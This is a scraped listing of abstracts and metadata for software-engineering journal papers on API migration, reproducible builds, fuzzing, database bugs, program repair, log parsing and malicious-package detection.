Pub Date : 2025-11-03DOI: 10.1109/TSE.2025.3627897
Tarek Mahmud;Bin Duan;Meiru Che;Awatif Yasmin;Anne H. H. Ngu;Guowei Yang
Android apps rely on application programming interfaces (APIs) to access various functionalities of Android devices. These APIs however are regularly updated to incorporate new features while the old APIs get deprecated. Even though the importance of updating deprecated API usages with the recommended replacement APIs has been widely recognized, it is non-trivial to update the deprecated API usages. Therefore, the usages of deprecated APIs linger in Android apps and cause compatibility issues in practice. This paper introduces GUPPY, an automated approach that utilizes large language models (LLMs) to update Android deprecated API usages. By employing carefully crafted Chain-of-Thoughts prompts, GUPPY leverages GPT-4, one of the most powerful LLMs, to update deprecated-API usages, ensuring compatibility in both the old and new API levels. Additionally, GUPPY uses GPT-4 to generate tests, identify incorrect updates, and refine the API usage through an iterative process until the tests pass or a specified limit is reached. Our evaluation, conducted on 360 benchmark API usages from 20 deprecated APIs and an additional 156 deprecated API usages from the latest API levels 33 and 34, demonstrates GUPPY’s advantages over the state-of-the-art techniques.
{"title":"Automated Update of Android Deprecated API Usages With Large Language Models","authors":"Tarek Mahmud;Bin Duan;Meiru Che;Awatif Yasmin;Anne H. H. Ngu;Guowei Yang","doi":"10.1109/TSE.2025.3627897","DOIUrl":"10.1109/TSE.2025.3627897","url":null,"abstract":"Android apps rely on application programming interfaces (APIs) to access various functionalities of Android devices. These APIs however are regularly updated to incorporate new features while the old APIs get deprecated. Even though the importance of updating deprecated API usages with the recommended replacement APIs has been widely recognized, it is non-trivial to update the deprecated API usages. Therefore, the usages of deprecated APIs linger in Android apps and cause compatibility issues in practice. This paper introduces GUPPY, an automated approach that utilizes large language models (LLMs) to update Android deprecated API usages. By employing carefully crafted Chain-of-Thoughts prompts, GUPPY leverages GPT-4, one of the most powerful LLMs, to update deprecated-API usages, ensuring compatibility in both the old and new API levels. Additionally, GUPPY uses GPT-4 to generate tests, identify incorrect updates, and refine the API usage through an iterative process until the tests pass or a specified limit is reached. Our evaluation, conducted on 360 benchmark API usages from 20 deprecated APIs and an additional 156 deprecated API usages from the latest API levels 33 and 34, demonstrates GUPPY’s advantages over the state-of-the-art techniques.","PeriodicalId":13324,"journal":{"name":"IEEE Transactions on Software Engineering","volume":"52 1","pages":"70-85"},"PeriodicalIF":5.6,"publicationDate":"2025-11-03","publicationTypes":"Journal Article","fieldsOfStudy":null,"isOpenAccess":false,"openAccessPdf":"","citationCount":null,"resultStr":null,"platform":"Semanticscholar","paperid":"145434090","PeriodicalName":null,"FirstCategoryId":null,"ListUrlMain":null,"RegionNum":1,"RegionCategory":"计算机科学","ArticlePicture":[],"TitleCN":null,"AbstractTextCN":null,"PMCID":"","EPubDate":null,"PubModel":null,"JCR":null,"JCRName":null,"Score":null,"Total":0}
Pub Date : 2025-11-03DOI: 10.1109/TSE.2025.3627891
Aman Sharma;Benoit Baudry;Martin Monperrus
The increasing complexity of software supply chains and the rise of supply chain attacks have elevated concerns around software integrity. Users and stakeholders face significant challenges in validating that a given software artifact corresponds to its declared source. Reproducible Builds address this challenge by ensuring that independently performed builds from identical source code produce identical binaries. However, achieving reproducibility at scale remains difficult, especially in Java, due to a range of non-deterministic factors and caveats in the build process. In this work, we focus on reproducibility in Java-based software, archetypal of enterprise applications. We introduce a conceptual framework for reproducible builds, we analyze a large dataset from Reproducible Central, and we develop a novel taxonomy of six root causes of unreproducibility. We study actionable mitigations: artifact and bytecode canonicalization using OSS-Rebuild and jNorm respectively. Finally, we present Chains-Rebuild (improvements to OSS-Rebuild), a tool that raises reproducibility success from 9.48% to 26.60% on 12,803 unreproducible artifacts. To sum up, our contributions are the first large-scale taxonomy of build unreproducibility causes in Java, a publicly available dataset of unreproducible builds, and Chains-Rebuild, a canonicalization tool for mitigating unreproducible builds in Java.
{"title":"Causes and Canonicalization of Unreproducible Builds in Java","authors":"Aman Sharma;Benoit Baudry;Martin Monperrus","doi":"10.1109/TSE.2025.3627891","DOIUrl":"10.1109/TSE.2025.3627891","url":null,"abstract":"The increasing complexity of software supply chains and the rise of supply chain attacks have elevated concerns around software integrity. Users and stakeholders face significant challenges in validating that a given software artifact corresponds to its declared source. Reproducible Builds address this challenge by ensuring that independently performed builds from identical source code produce identical binaries. However, achieving reproducibility at scale remains difficult, especially in Java, due to a range of non-deterministic factors and caveats in the build process. In this work, we focus on reproducibility in Java-based software, archetypal of enterprise applications. We introduce a conceptual framework for reproducible builds, we analyze a large dataset from Reproducible Central, and we develop a novel taxonomy of six root causes of unreproducibility. We study actionable mitigations: artifact and bytecode canonicalization using <sc>OSS-Rebuild</small> and <sc>jNorm</small> respectively. Finally, we present <sc>Chains-Rebuild</small> (improvements to <sc>OSS-Rebuild</small>), a tool that raises reproducibility success from 9.48% to 26.60% on <sc>12,803</small> unreproducible artifacts. To sum up, our contributions are the first large-scale taxonomy of build unreproducibility causes in Java, a publicly available dataset of unreproducible builds, and <sc>Chains-Rebuild</small>, a canonicalization tool for mitigating unreproducible builds in Java.","PeriodicalId":13324,"journal":{"name":"IEEE Transactions on Software Engineering","volume":"52 1","pages":"54-69"},"PeriodicalIF":5.6,"publicationDate":"2025-11-03","publicationTypes":"Journal Article","fieldsOfStudy":null,"isOpenAccess":false,"openAccessPdf":"https://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=11223991","citationCount":null,"resultStr":null,"platform":"Semanticscholar","paperid":"145434092","PeriodicalName":null,"FirstCategoryId":null,"ListUrlMain":null,"RegionNum":1,"RegionCategory":"计算机科学","ArticlePicture":[],"TitleCN":null,"AbstractTextCN":null,"PMCID":"OA","EPubDate":null,"PubModel":null,"JCR":null,"JCRName":null,"Score":null,"Total":0}
Pub Date : 2025-10-31DOI: 10.1109/TSE.2025.3627580
An Guo;Zhiwei Su;Xinyu Gao;Chunrong Fang;Senrong Wang;Haoxiang Tian;Wu Wen;Lei Ma;Zhenyu Chen
Autonomous driving systems (ADSs) have the potential to enhance safety through advanced perception and reaction capabilities, reduce emissions by alleviating congestion, and contribute to various improvements in quality of life. Despite significant advancements in ADSs, several real-world accidents resulting in fatalities have occurred due to failures in the autonomous driving perception modules. As a critical component of autonomous vehicles, LiDAR-based perception systems are marked by high complexity and low interpretability, necessitating the development of effective testing methods for these systems. Current testing methods largely depend on manual data collection and labeling, which restricts their ability to detect a diverse range of erroneous behaviors. This process is not only time-consuming and labor-intensive, but it may also result in the recurrent discovery of similar erroneous behaviors during testing, hindering a comprehensive assessment of the systems. In this paper, we propose and implement a fuzzing framework for LiDAR-based autonomous driving perception systems, named LDFuzz, grounded in metamorphic testing theory. This framework offers the first uniform solution for the automated generation of tests with oracle information. To enhance testing efficiency and increase the number of tests that identify erroneous behaviors, we incorporate spatial and semantic coverage based on the characteristics of point cloud data to guide the generation process. We evaluate the performance of LDFuzz through experiments conducted on four LiDAR-based autonomous driving perception systems designed for the 3D object detection task. The experimental results demonstrate that the tests produced by LDFuzz can effectively detect an average of 7.5% more erroneous behaviors within LiDAR-based perception systems than the optimal baseline. Furthermore, the findings indicate that LDFuzz significantly enhances the diversity of failed tests.
{"title":"Spatial Semantic Fuzzing for LiDAR-Based Autonomous Driving Perception Systems","authors":"An Guo;Zhiwei Su;Xinyu Gao;Chunrong Fang;Senrong Wang;Haoxiang Tian;Wu Wen;Lei Ma;Zhenyu Chen","doi":"10.1109/TSE.2025.3627580","DOIUrl":"10.1109/TSE.2025.3627580","url":null,"abstract":"Autonomous driving systems (ADSs) have the potential to enhance safety through advanced perception and reaction capabilities, reduce emissions by alleviating congestion, and contribute to various improvements in quality of life. Despite significant advancements in ADSs, several real-world accidents resulting in fatalities have occurred due to failures in the autonomous driving perception modules. As a critical component of autonomous vehicles, LiDAR-based perception systems are marked by high complexity and low interpretability, necessitating the development of effective testing methods for these systems. Current testing methods largely depend on manual data collection and labeling, which restricts their ability to detect a diverse range of erroneous behaviors. This process is not only time-consuming and labor-intensive, but it may also result in the recurrent discovery of similar erroneous behaviors during testing, hindering a comprehensive assessment of the systems. In this paper, we propose and implement a fuzzing framework for LiDAR-based autonomous driving perception systems, named LDFuzz, grounded in metamorphic testing theory. This framework offers the first uniform solution for the automated generation of tests with oracle information. To enhance testing efficiency and increase the number of tests that identify erroneous behaviors, we incorporate spatial and semantic coverage based on the characteristics of point cloud data to guide the generation process. We evaluate the performance of LDFuzz through experiments conducted on four LiDAR-based autonomous driving perception systems designed for the 3D object detection task. The experimental results demonstrate that the tests produced by LDFuzz can effectively detect an average of 7.5% more erroneous behaviors within LiDAR-based perception systems than the optimal baseline. Furthermore, the findings indicate that LDFuzz significantly enhances the diversity of failed tests.","PeriodicalId":13324,"journal":{"name":"IEEE Transactions on Software Engineering","volume":"52 1","pages":"187-205"},"PeriodicalIF":5.6,"publicationDate":"2025-10-31","publicationTypes":"Journal Article","fieldsOfStudy":null,"isOpenAccess":false,"openAccessPdf":"","citationCount":null,"resultStr":null,"platform":"Semanticscholar","paperid":"145412132","PeriodicalName":null,"FirstCategoryId":null,"ListUrlMain":null,"RegionNum":1,"RegionCategory":"计算机科学","ArticlePicture":[],"TitleCN":null,"AbstractTextCN":null,"PMCID":"","EPubDate":null,"PubModel":null,"JCR":null,"JCRName":null,"Score":null,"Total":0}
Pub Date : 2025-10-31DOI: 10.1109/TSE.2025.3625300
Shuang Liu;Ruifeng Wang;Yuanfeng Xie;Junjie Chen;Wei Lu;Xiao Zhang;Quanqing Xu;Chuanhui Yang;Xiaoyong Du
Relational Database Management Systems (RDBMSs) are crucial infrastructures supporting a wide range of applications, making bug mitigation within these systems essential. This study presents the first comprehensive analysis of bugs in three popular open-source RDBMSs—MySQL, SQLite, and openGauss. We manually examined 777 bugs across four dimensions, i.e., bug root causes, bug symptoms, bug distribution across modules, and the correlations between the studied aspects. We also analyzed the bug-triggering SQL statements to uncover test cases that cannot be generated by existing tools. We have made 12 findings, which throw lights on the development, maintenance and testing of RDBMS systems. Particularly, our findings reveal that bugs related to SQL data types and complex features, such as database triggers, procedures and database parameter settings, present significant opportunities for enhancing RDBMS bug detection and mitigation. Leveraging these insights, we developed a tool, SQLT, which effectively identified eight RDBMS bugs (five type-related), all verified by developers, with four subsequently fixed.
{"title":"A Comprehensive Study of Bugs in Relational DBMS","authors":"Shuang Liu;Ruifeng Wang;Yuanfeng Xie;Junjie Chen;Wei Lu;Xiao Zhang;Quanqing Xu;Chuanhui Yang;Xiaoyong Du","doi":"10.1109/TSE.2025.3625300","DOIUrl":"10.1109/TSE.2025.3625300","url":null,"abstract":"Relational Database Management Systems (RDBMSs) are crucial infrastructures supporting a wide range of applications, making bug mitigation within these systems essential. This study presents the first comprehensive analysis of bugs in three popular open-source RDBMSs—MySQL, SQLite, and openGauss. We manually examined 777 bugs across four dimensions, i.e., bug root causes, bug symptoms, bug distribution across modules, and the correlations between the studied aspects. We also analyzed the bug-triggering SQL statements to uncover test cases that cannot be generated by existing tools. We have made 12 findings, which throw lights on the development, maintenance and testing of RDBMS systems. Particularly, our findings reveal that bugs related to SQL data types and complex features, such as database triggers, procedures and database parameter settings, present significant opportunities for enhancing RDBMS bug detection and mitigation. Leveraging these insights, we developed a tool, <sc>SQLT</small>, which effectively identified eight RDBMS bugs (five type-related), all verified by developers, with four subsequently fixed.","PeriodicalId":13324,"journal":{"name":"IEEE Transactions on Software Engineering","volume":"51 12","pages":"3654-3668"},"PeriodicalIF":5.6,"publicationDate":"2025-10-31","publicationTypes":"Journal Article","fieldsOfStudy":null,"isOpenAccess":false,"openAccessPdf":"","citationCount":null,"resultStr":null,"platform":"Semanticscholar","paperid":"145412135","PeriodicalName":null,"FirstCategoryId":null,"ListUrlMain":null,"RegionNum":1,"RegionCategory":"计算机科学","ArticlePicture":[],"TitleCN":null,"AbstractTextCN":null,"PMCID":"","EPubDate":null,"PubModel":null,"JCR":null,"JCRName":null,"Score":null,"Total":0}
Pub Date : 2025-10-30DOI: 10.1109/TSE.2025.3627220
Lukas Kirschner;Ezekiel Soremekun
Context: To effectively test complex software, it is important to generate goal-specific inputs, i.e., inputs that achieve a specific testing goal. For instance, developers may intend to target one or more testing goal(s) during testing – generate complex inputs or trigger new or error-prone behaviors. Problem: However, most state-of-the-art test generators are not designed to target specific goals. Notably, grammar-based test generators, which (randomly) produce syntactically valid inputs via an input specification (i.e., grammar) have a low probability of achieving an arbitrary testing goal. Aim: This work addresses this challenge by proposing an automated test generation approach (called FdLoop) which iteratively learns relevant input properties from existing inputs to drive the generation of goal-specific inputs. Method: The main idea of our approach is to leverage test feedback to generate goal-specific inputs via a combination of evolutionary testing and grammar learning. FdLoop automatically learns a mapping between input structures and a specific testing goal, such mappings allow to generate inputs that target the goal-at-hand. Given a testing goal, FdLoop iteratively selects, evolves and learn the input distribution of goal-specific test inputs via test feedback and a probabilistic grammar. We concretize FdLoop for four testing goals, namely unique code coverage, input-to-code complexity, program failures (exceptions) and long execution time. We evaluate FdLoop using three (3) well-known input formats (JSON, CSS and JavaScript) and 20 open-source software. Results: In most (86%) settings, FdLoop outperforms all five tested baselines namely the baseline grammar-based test generators (random, probabilistic and inverse-probabilistic methods), EvoGFuzz and DynaMOSA. FdLoop is (up to) twice (2X) as effective as the best baseline (EvoGFuzz) in inducing erroneous behaviors. In addition, we show that the main components of FdLoop (i.e., input mutator, grammar mutator and test feedbacks) contribute positively to its effectiveness. We also observed that FdLoop is effective across varying parameter settings – the number of initial seed inputs, the number of generated inputs, the number of input generations and varying random seed values. Implications: Finally, our evaluation demonstrates that FdLoop effectively achieves single testing goals (revealing erroneous behaviors, generating complex inputs, or inducing long execution time) and scales to multiple testing goals.
{"title":"Directed Grammar-Based Test Generation","authors":"Lukas Kirschner;Ezekiel Soremekun","doi":"10.1109/TSE.2025.3627220","DOIUrl":"10.1109/TSE.2025.3627220","url":null,"abstract":"<bold>Context:</b> To effectively test complex software, it is important to generate <italic>goal-specific inputs</i>, i.e., inputs that achieve a specific testing goal. For instance, developers may intend to target one or more testing goal(s) during testing – generate complex inputs or trigger new or error-prone behaviors. <bold>Problem:</b> However, most state-of-the-art test generators are not designed to <italic>target specific goals.</i> Notably, grammar-based test generators, which (randomly) produce <italic>syntactically valid inputs</i> via an input specification (i.e., grammar) have a low probability of achieving an arbitrary testing goal. <bold>Aim:</b> This work addresses this challenge by proposing an automated test generation approach (called <sc>FdLoop</small>) which iteratively learns relevant input properties from existing inputs to drive the generation of goal-specific inputs. <bold>Method:</b> The main idea of our approach is to leverage <italic>test feedback</i> to generate <italic>goal-specific inputs</i> via a combination of <italic>evolutionary testing</i> and <italic>grammar learning</i>. <sc>FdLoop</small> automatically learns a mapping between input structures and a specific testing goal, such mappings allow to generate inputs that target the goal-at-hand. Given a testing goal, <sc>FdLoop</small> iteratively selects, evolves and learn the input distribution of goal-specific test inputs via test feedback and a probabilistic grammar. We concretize <sc>FdLoop</small> for four testing goals, namely unique code coverage, input-to-code complexity, program failures (exceptions) and long execution time. We evaluate <sc>FdLoop</small> using three (3) well-known input formats (JSON, CSS and JavaScript) and 20 open-source software. <bold>Results:</b> In most (86%) settings, <sc>FdLoop</small> outperforms all five tested baselines namely the baseline grammar-based test generators (random, probabilistic and inverse-probabilistic methods), EvoGFuzz and DynaMOSA. <sc>FdLoop</small> is (up to) twice (2X) as effective as the best baseline (EvoGFuzz) in inducing erroneous behaviors. In addition, we show that the main components of <sc>FdLoop</small> (i.e., input mutator, grammar mutator and test feedbacks) contribute positively to its effectiveness. We also observed that <sc>FdLoop</small> is effective across varying parameter settings – the number of initial seed inputs, the number of generated inputs, the number of input generations and varying random seed values. <bold>Implications:</b> Finally, our evaluation demonstrates that <sc>FdLoop</small> effectively achieves single testing goals (revealing erroneous behaviors, generating complex inputs, or inducing long execution time) and scales to multiple testing goals.","PeriodicalId":13324,"journal":{"name":"IEEE Transactions on Software Engineering","volume":"51 12","pages":"3669-3691"},"PeriodicalIF":5.6,"publicationDate":"2025-10-30","publicationTypes":"Journal Article","fieldsOfStudy":null,"isOpenAccess":false,"openAccessPdf":"","citationCount":null,"resultStr":null,"platform":"Semanticscholar","paperid":"145404155","PeriodicalName":null,"FirstCategoryId":null,"ListUrlMain":null,"RegionNum":1,"RegionCategory":"计算机科学","ArticlePicture":[],"TitleCN":null,"AbstractTextCN":null,"PMCID":"","EPubDate":null,"PubModel":null,"JCR":null,"JCRName":null,"Score":null,"Total":0}
Temporal logics like Computation Tree Logic (CTL) have been widely used as expressive formalisms to capture rich behavioural specifications. CTL can express properties such as reachability, termination, invariants and responsiveness, which are difficult to test. This paper suggests a mechanism for the automated repair of infinite-state programs guided by CTL properties. Our produced patches avoid the overfitting issue that occurs in test-suite-guided repair, where the repaired code may not pass tests outside the given test suite. To realise this vision, we propose a novel find-and-fix framework based on Datalog, a widely used domain-specific language for program analysis, which readily supports nested fixed-point semantics of CTL via stratified negation. Specifically, our framework encodes the program and CTL properties into Datalog facts and rules and performs the repair by modifying the facts to pass the analysis rules. In the framework, to achieve both analysis and repair results, we adapt existing techniques – including loop summarisation and Symbolic Execution of Datalog (SEDL) – with key modifications. Our approach achieves analysis accuracy of 56.6% on a CTL verification benchmark and 88.5% on a termination/responsiveness benchmark, surpassing the best baseline performances of 27.7% and 76.9%, respectively. Our approach repairs all detected bugs, which is not achieved by existing tools.
{"title":"Computation Tree Logic Guided Program Repair","authors":"Yu Liu;Yahui Song;Martin Mirchev;Abhik Roychoudhury","doi":"10.1109/TSE.2025.3625772","DOIUrl":"10.1109/TSE.2025.3625772","url":null,"abstract":"Temporal logics like Computation Tree Logic (CTL) have been widely used as expressive formalisms to capture rich behavioural specifications. CTL can express properties such as reachability, termination, invariants and responsiveness, which are difficult to test. This paper suggests a mechanism for the automated repair of infinite-state programs guided by CTL properties. Our produced patches avoid the overfitting issue that occurs in test-suite-guided repair, where the repaired code may not pass tests outside the given test suite. To realise this vision, we propose a novel find-and-fix framework based on Datalog, a widely used domain-specific language for program analysis, which readily supports nested fixed-point semantics of CTL via stratified negation. Specifically, our framework encodes the program and CTL properties into Datalog facts and rules and performs the repair by modifying the facts to pass the analysis rules. In the framework, to achieve both analysis and repair results, we adapt existing techniques – including loop summarisation and Symbolic Execution of Datalog (SEDL) – with key modifications. Our approach achieves analysis accuracy of 56.6% on a CTL verification benchmark and 88.5% on a termination/responsiveness benchmark, surpassing the best baseline performances of 27.7% and 76.9%, respectively. Our approach repairs all detected bugs, which is not achieved by existing tools.","PeriodicalId":13324,"journal":{"name":"IEEE Transactions on Software Engineering","volume":"52 1","pages":"321-337"},"PeriodicalIF":5.6,"publicationDate":"2025-10-27","publicationTypes":"Journal Article","fieldsOfStudy":null,"isOpenAccess":false,"openAccessPdf":"https://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=11218954","citationCount":null,"resultStr":null,"platform":"Semanticscholar","paperid":"145381252","PeriodicalName":null,"FirstCategoryId":null,"ListUrlMain":null,"RegionNum":1,"RegionCategory":"计算机科学","ArticlePicture":[],"TitleCN":null,"AbstractTextCN":null,"PMCID":"OA","EPubDate":null,"PubModel":null,"JCR":null,"JCRName":null,"Score":null,"Total":0}
Logs of large-scale cloud systems record diverse system events, ranging from routine statuses to critical errors. As the fundamental step of automated log analysis, log parsing is to transform unstructured logs into structured data for easier management and analysis. However, existing syntax-based and deep learning-based parsers struggle with complex real-world logs. Recent parsers based on large language models (LLMs) achieve higher accuracy, but they typically rely on online APIs (e.g., ChatGPT), raising privacy concerns and suffering from network latency. Moreover, with the rise of artificial intelligence for IT operations (AIOps), traditional parsers that focus on syntax-level templates fail to capture the semantics of dynamic log parameters, limiting their usefulness for downstream tasks. These challenges highlight the need for semantic log parsing that goes beyond template extraction to understand parameter semantics. This paper presents SemanticLog, an effective and efficient semantic log parser powered by open-source LLMs. SemanticLog adapts the structure of LLMs to the log parsing task, leveraging their rich knowledge while safeguarding log data privacy. It first extracts informative feature representations from log data, then refines them through fine-grained semantic perception to enable accurate template and parameter extraction together with semantic category prediction. To boost scalability, SemanticLog introduces the EffiParsing tree for faster inference on large-scale logs. Extensive experiments on the LogHub-2.0 dataset show that SemanticLog significantly outperforms the state-of-the-art log parsers in terms of accuracy. Moreover, it also surpasses existing LLM-based parsers in efficiency while showcasing advanced semantic parsing capability. Notably, SemanticLog employs much smaller open-source LLMs compared to existing LLM-based parsers (mainly based on ChatGPT), while maintaining better capability of log data privacy protection.
{"title":"SemanticLog: Towards Effective and Efficient Large-Scale Semantic Log Parsing","authors":"Chenbo Zhang;Wenying Xu;Jinbu Liu;Lu Zhang;Guiyang Liu;Jihong Guan;Qi Zhou;Shuigeng Zhou","doi":"10.1109/TSE.2025.3625121","DOIUrl":"10.1109/TSE.2025.3625121","url":null,"abstract":"Logs of large-scale cloud systems record diverse system events, ranging from routine statuses to critical errors. As the fundamental step of automated log analysis, log parsing is to transform unstructured logs into structured data for easier management and analysis. However, existing syntax-based and deep learning-based parsers struggle with complex real-world logs. Recent parsers based on large language models (LLMs) achieve higher accuracy, but they typically rely on online APIs (e.g., ChatGPT), raising privacy concerns and suffering from network latency. Moreover, with the rise of artificial intelligence for IT operations (AIOps), traditional parsers that focus on syntax-level templates fail to capture the semantics of dynamic log parameters, limiting their usefulness for downstream tasks. These challenges highlight the need for semantic log parsing that goes beyond template extraction to understand parameter semantics. This paper presents <bold>SemanticLog</b>, an effective and efficient semantic log parser powered by open-source LLMs. SemanticLog adapts the structure of LLMs to the log parsing task, leveraging their rich knowledge while safeguarding log data privacy. It first extracts informative feature representations from log data, then refines them through fine-grained semantic perception to enable accurate template and parameter extraction together with semantic category prediction. To boost scalability, SemanticLog introduces the EffiParsing tree for faster inference on large-scale logs. Extensive experiments on the LogHub-2.0 dataset show that SemanticLog significantly outperforms the state-of-the-art log parsers in terms of accuracy. Moreover, it also surpasses existing LLM-based parsers in efficiency while showcasing advanced semantic parsing capability. Notably, SemanticLog employs much smaller open-source LLMs compared to existing LLM-based parsers (mainly based on ChatGPT), while maintaining better capability of log data privacy protection.","PeriodicalId":13324,"journal":{"name":"IEEE Transactions on Software Engineering","volume":"52 1","pages":"155-170"},"PeriodicalIF":5.6,"publicationDate":"2025-10-24","publicationTypes":"Journal Article","fieldsOfStudy":null,"isOpenAccess":false,"openAccessPdf":"","citationCount":null,"resultStr":null,"platform":"Semanticscholar","paperid":"145381322","PeriodicalName":null,"FirstCategoryId":null,"ListUrlMain":null,"RegionNum":1,"RegionCategory":"计算机科学","ArticlePicture":[],"TitleCN":null,"AbstractTextCN":null,"PMCID":"","EPubDate":null,"PubModel":null,"JCR":null,"JCRName":null,"Score":null,"Total":0}
Pub Date : 2025-10-23DOI: 10.1109/tse.2025.3624631
Mohamed Sami Rakha, Andriy Miranskyy, Daniel Alencar da Costa
{"title":"Contrasting the Hyperparameter Tuning Impact Across Software Defect Prediction Scenarios","authors":"Mohamed Sami Rakha, Andriy Miranskyy, Daniel Alencar da Costa","doi":"10.1109/tse.2025.3624631","DOIUrl":"https://doi.org/10.1109/tse.2025.3624631","url":null,"abstract":"","PeriodicalId":13324,"journal":{"name":"IEEE Transactions on Software Engineering","volume":"63 1","pages":""},"PeriodicalIF":7.4,"publicationDate":"2025-10-23","publicationTypes":"Journal Article","fieldsOfStudy":null,"isOpenAccess":false,"openAccessPdf":"","citationCount":null,"resultStr":null,"platform":"Semanticscholar","paperid":"145397747","PeriodicalName":null,"FirstCategoryId":null,"ListUrlMain":null,"RegionNum":1,"RegionCategory":"计算机科学","ArticlePicture":[],"TitleCN":null,"AbstractTextCN":null,"PMCID":"","EPubDate":null,"PubModel":null,"JCR":null,"JCRName":null,"Score":null,"Total":0}
Software repositories such as PyPI and npm are vital for software development but expose users to serious security risks from malicious packages. The malicious packages often execute their payloads immediately upon installation, leading to rapid system compromise. Existing detection methods are heavily dependent on difficult-to-obtain explicit knowledge, rendering them susceptible to overlooking emergent malicious packages. In this paper, we present a lightweight and effective method, namely EMPHunter, to detect malicious packages without requiring any explicit prior knowledge. EMPHunter is founded upon two fundamental and insightful observations. First, malicious packages are considerably rarer than benign ones, and second, the functionality of installation scripts for malicious packages diverges significantly from those of benign packages, with the latter frequently forming clusters. Consequently, EMPHunter utilizes the clustering technique to group the unique installation scripts of new-uploaded packages and identifies outliers as candidate malicious packages. It then ranks the outliers according to their deviate degrees and the distance between each of them and known malicious instances, effectively highlighting potential malicious packages. With EMPHunter, we successfully identified 122 previously unknown malicious packages from a pool of 267,009 newly-uploaded PyPI and npm packages, achieving an mAP (Mean Average Precision) of 0.813 and an exceptional recall of 0.992 when auditing the top-10 rankings. All detected packages have been officially confirmed as genuine malicious package by PyPI and npm. We assert that EMPHunter offers a valuable and advantageous supplement to existing detection tools, augmenting the arsenal of software supply chain security analysis.
{"title":"Detecting Malicious Packages in PyPI and NPM by Clustering Installation Scripts","authors":"Wentao Liang;Xiang Ling;Chen Zhao;Jingzheng Wu;Tianyue Luo;Yanjun Wu","doi":"10.1109/TSE.2025.3618952","DOIUrl":"10.1109/TSE.2025.3618952","url":null,"abstract":"Software repositories such as PyPI and npm are vital for software development but expose users to serious security risks from malicious packages. The malicious packages often execute their payloads immediately upon installation, leading to rapid system compromise. Existing detection methods are heavily dependent on difficult-to-obtain explicit knowledge, rendering them susceptible to overlooking emergent malicious packages. In this paper, we present a lightweight and effective method, namely EMPHunter, to detect malicious packages without requiring any explicit prior knowledge. EMPHunter is founded upon two fundamental and insightful observations. First, malicious packages are considerably rarer than benign ones, and second, the functionality of installation scripts for malicious packages diverges significantly from those of benign packages, with the latter frequently forming clusters. Consequently, EMPHunter utilizes the clustering technique to group the unique installation scripts of new-uploaded packages and identifies outliers as candidate malicious packages. It then ranks the outliers according to their deviate degrees and the distance between each of them and known malicious instances, effectively highlighting potential malicious packages. With EMPHunter, we successfully identified 122 previously unknown malicious packages from a pool of 267,009 newly-uploaded PyPI and npm packages, achieving an mAP (Mean Average Precision) of 0.813 and an exceptional recall of 0.992 when auditing the top-10 rankings. All detected packages have been officially confirmed as genuine malicious package by PyPI and npm. We assert that EMPHunter offers a valuable and advantageous supplement to existing detection tools, augmenting the arsenal of software supply chain security analysis.","PeriodicalId":13324,"journal":{"name":"IEEE Transactions on Software Engineering","volume":"52 1","pages":"36-53"},"PeriodicalIF":5.6,"publicationDate":"2025-10-23","publicationTypes":"Journal Article","fieldsOfStudy":null,"isOpenAccess":false,"openAccessPdf":"","citationCount":null,"resultStr":null,"platform":"Semanticscholar","paperid":"145397750","PeriodicalName":null,"FirstCategoryId":null,"ListUrlMain":null,"RegionNum":1,"RegionCategory":"计算机科学","ArticlePicture":[],"TitleCN":null,"AbstractTextCN":null,"PMCID":"","EPubDate":null,"PubModel":null,"JCR":null,"JCRName":null,"Score":null,"Total":0}